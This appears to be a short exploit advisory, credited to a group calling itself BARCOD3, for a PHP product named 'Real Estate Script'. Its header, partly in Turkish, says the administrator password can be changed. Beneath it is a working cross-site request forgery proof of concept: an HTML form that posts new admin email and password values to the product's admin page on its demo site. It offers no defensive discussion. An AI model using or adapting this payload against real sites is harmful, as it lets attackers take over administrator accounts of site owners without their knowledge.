< ------------------- header data start ------------------- >
#############################################################
# Application Name : Real Estate Script
# vulnerable Type : XSRF
# Infection : Admin pass Change Edilebilir.
# Demo : http://realestatephp.com/demo/
# author : BARCOD3 - Bug Researchers
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
<form name=user_form action=http://realestatephp.com/demo/realestate-admin/realestate.php method=post onSubmit=return verify_form();>
<input type=hidden name=mode value=admin_list>
<input type=hidden name=step value=process>
<input type=text id=email name=email value=[email protected] class=textfield2>
<input type=password id=password name=password value=passWORD class=textfield2>
<input type=password id=retype_password name=retype_password value=RETYPE passWORD class=textfield2>
<input type=submit value=Save class=buttons2>
</form>
< -- bug code end of -- >